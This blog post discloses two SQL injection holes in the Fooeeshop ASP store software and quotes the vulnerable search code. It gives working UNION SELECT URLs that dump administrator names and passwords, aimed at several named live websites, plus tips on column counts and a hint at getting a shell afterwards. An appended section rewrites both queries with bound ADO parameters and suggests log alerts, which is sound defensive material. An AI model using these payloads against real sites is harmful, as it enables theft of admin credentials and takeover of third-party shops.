From Shaun's Blog (www.virusest.com)
Fooeeshop has a SQL injection vulnerability in its search functionality, in two places.
1. Gift_Search_List.asp
Dim strGift_Key: strGift_Key = Request.QueryString("Gift_Key")   ' Gift_Key is not checked here
Dim intGift_Point_From: intGift_Point_From = Request.QueryString("Gift_Point_From")
Dim intGift_Point_To: intGift_Point_To = Request.QueryString("Gift_Point_To")
Dim intGift_Category: intGift_Category = Request.QueryString("Gift_Category")
strSQL = "SELECT * FROM FOOEE_GIFT WHERE GIFT_NAME LIKE '%" & strGift_Key & "%'"   ' Gift_Key goes straight into the query here: this is where the injection happens
If intGift_Category <> "" And IsNumeric(intGift_Category) Then
    strSQL = strSQL & " AND GIFT_CATEGORYID = " & intGift_Category & ""
End If
If intGift_Category = "" Then intGift_Category = 0
If intGift_Point_From <> "" And IsNumeric(intGift_Point_From) And intGift_Point_To <> "" And IsNumeric(intGift_Point_To) Then
    strSQL = strSQL & " AND GIFT_POINT BETWEEN " & intGift_Point_From & " AND " & intGift_Point_To & ""
End If
From Shaun's testing: to exploit this, the site must have gifts on offer so that the query returns results; otherwise the injection fails.
Exp:
Http://www.shaokaolu.cn/Gift_Search_List.ASP? Gift_key = % 25% 27 + and + 1% 3D2 + union + select + 1% 2C2% 2CADMIN_NAME % 26ADMIN_PASSWORD % 2C4% 2C5% 2C6% 2C7% 2C8% 2C9% 2C10% 2C11% 2C12% 2C13% 2C14% 2C15% 2C16 + from + FOOEE_ADMINISTRATOR + where + % 27% 25% 27% 3D % 27
Http://www.020kfc.cn/Gift_Search_List.ASP? Gift_key = % 25% 27 + and + 1% 3D2 + union + select + 1% 2C2% 2CADMIN_NAME % 26ADMIN_PASSWORD % 2C4% 2C5% 2C6% 2C7% 2C8% 2C9% 2C10% 2C11% 2C12% 2C13% 2C14% 2C15% 2C16 + from + FOOEE_ADMINISTRATOR + where + % 27% 25% 27% 3D % 27
2. SearchResult/Index.asp
Dim strKeyWords: strKeyWords = Fooee.CheckStr(Request.QueryString("KeyWords"))
Dim intStartPrice: intStartPrice = Request.QueryString("StartPrice")
Dim intEndPrice: intEndPrice = Request.QueryString("EndPrice")
Dim intProductCategoryID: intProductCategoryID = Request.QueryString("ProductCategoryID")
Dim strProductBrand: strProductBrand = Request.QueryString("ProductBrand")
Dim strSearchType: strSearchType = Request.QueryString("SearchType")
Dim strSQL: strSQL = "SELECT * FROM FOOEE_PRODUCT WHERE PRO_NAME LIKE '%" & strKeyWords & "%' AND PRO_DISPLAY = 1"
If intProductCategoryID <> "" And IsNumeric(intProductCategoryID) Then
    strSQL = strSQL & " AND PRO_SORT = " & Fooee.CheckNum(intProductCategoryID) & ""
End If
If strProductBrand <> "" Then
    strSQL = strSQL & " AND PRO_BRAND = " & strProductBrand & ""   ' strProductBrand is not checked before it goes into the query
End If
If intStartPrice <> "" And IsNumeric(intStartPrice) And intEndPrice <> "" And IsNumeric(intEndPrice) Then
    strSQL = strSQL & " AND PRO_SHOPPRICE BETWEEN " & Fooee.CheckNum(intStartPrice) & " AND " & Fooee.CheckNum(intEndPrice) & ""
End If
This one is easy to exploit. As long as the site has advanced search enabled, open Advanced Search, select a brand, run the search, note the brand value in the browser's address bar, and inject through that parameter.
Exp:
Http://www.0779home.com/SearchResult? ProductBrand = % D4 % BD % C4 % CF % CD % AC % BC % C3 % 20 union % 20 select %, 0, 0, admin_name % 2badmin_password, 0,, from % 20FOOEE_ADMINISTRATOR
Http://www.myhdd.com.cn/SearchResult? ProductBrand = % CE % F7 % B2 % BF % CA % FD % BE % DD % 20 union % 20 select %, 0, 0, admin_name % 2badmin_password, 0, 0, 0, 0, 0, 0, 0, 0, from % 20FOOEE_ADMINISTRATOR
If the response says the number of columns does not match, try adding or removing columns.
Getting a shell from the admin backend is left for your own research.
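As an added example (not Fooeeshop's code and not from this post), here are both search queries above rebuilt with ADO command parameters, which removes the string concatenation that both findings depend on. It assumes an open ADODB.Connection object named conn, as the original pages use; the BindParam helper and the two function names are mine; the table and column names are the ones shown in the post.

```vbscript
' Added example, not Fooeeshop's own code: the Gift_Search_List.asp and
' SearchResult/Index.asp queries with every user-supplied value bound as an
' ADO parameter, so a quote or a UNION in Gift_Key or ProductBrand stays data.
' Assumed: an open ADODB.Connection named conn.
Const adCmdText = 1
Const adVarChar = 200
Const adInteger = 3
Const adParamInput = 1

' Appends one input parameter to a command. Size matters only for string types.
Sub BindParam(cmd, strName, lngType, lngSize, varValue)
    cmd.Parameters.Append cmd.CreateParameter(strName, lngType, adParamInput, lngSize, varValue)
End Sub

' Gift_Search_List.asp: the LIKE pattern is assembled in VBScript and passed
' whole as one value; the SQL text itself never contains the user's input.
' Parameters are positional, so they are appended in the same order as the ? marks.
Function SearchGifts(conn, strGift_Key, intGift_Category, intGift_Point_From, intGift_Point_To)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "SELECT * FROM FOOEE_GIFT WHERE GIFT_NAME LIKE ?"
    BindParam cmd, "key", adVarChar, 255, "%" & strGift_Key & "%"
    If intGift_Category <> "" And IsNumeric(intGift_Category) Then
        cmd.CommandText = cmd.CommandText & " AND GIFT_CATEGORYID = ?"
        BindParam cmd, "cat", adInteger, 0, CLng(intGift_Category)
    End If
    If intGift_Point_From <> "" And IsNumeric(intGift_Point_From) And intGift_Point_To <> "" And IsNumeric(intGift_Point_To) Then
        cmd.CommandText = cmd.CommandText & " AND GIFT_POINT BETWEEN ? AND ?"
        BindParam cmd, "from", adInteger, 0, CLng(intGift_Point_From)
        BindParam cmd, "to", adInteger, 0, CLng(intGift_Point_To)
    End If
    Set SearchGifts = cmd.Execute
End Function

' SearchResult/Index.asp: the brand filter, which the original concatenated
' unchecked, is bound the same way. Nothing here relies on Fooee.CheckStr or
' Fooee.CheckNum, whose implementation the post does not show.
Function SearchProducts(conn, strKeyWords, strProductBrand, intProductCategoryID, intStartPrice, intEndPrice)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "SELECT * FROM FOOEE_PRODUCT WHERE PRO_NAME LIKE ? AND PRO_DISPLAY = 1"
    BindParam cmd, "kw", adVarChar, 255, "%" & strKeyWords & "%"
    If intProductCategoryID <> "" And IsNumeric(intProductCategoryID) Then
        cmd.CommandText = cmd.CommandText & " AND PRO_SORT = ?"
        BindParam cmd, "sort", adInteger, 0, CLng(intProductCategoryID)
    End If
    If strProductBrand <> "" Then
        cmd.CommandText = cmd.CommandText & " AND PRO_BRAND = ?"
        BindParam cmd, "brand", adVarChar, 255, strProductBrand
    End If
    If intStartPrice <> "" And IsNumeric(intStartPrice) And intEndPrice <> "" And IsNumeric(intEndPrice) Then
        cmd.CommandText = cmd.CommandText & " AND PRO_SHOPPRICE BETWEEN ? AND ?"
        BindParam cmd, "pfrom", adInteger, 0, CLng(intStartPrice)
        BindParam cmd, "pto", adInteger, 0, CLng(intEndPrice)
    End If
    Set SearchProducts = cmd.Execute
End Function
```

With the values bound, the closing `'%'='` in the Gift_Key payload and the `union select` appended to ProductBrand are compared literally against GIFT_NAME and PRO_BRAND, and the query returns nothing for them. The IsNumeric checks are kept, but they now only decide whether a clause is added, not whether a value is safe; a filter such as Fooee.CheckStr is likewise not a substitute for binding. On the detection side, both attacks leave `union` and `select` in the Gift_Key or ProductBrand query string of the IIS request log, which is a cheap thing to alert on until the fix is deployed.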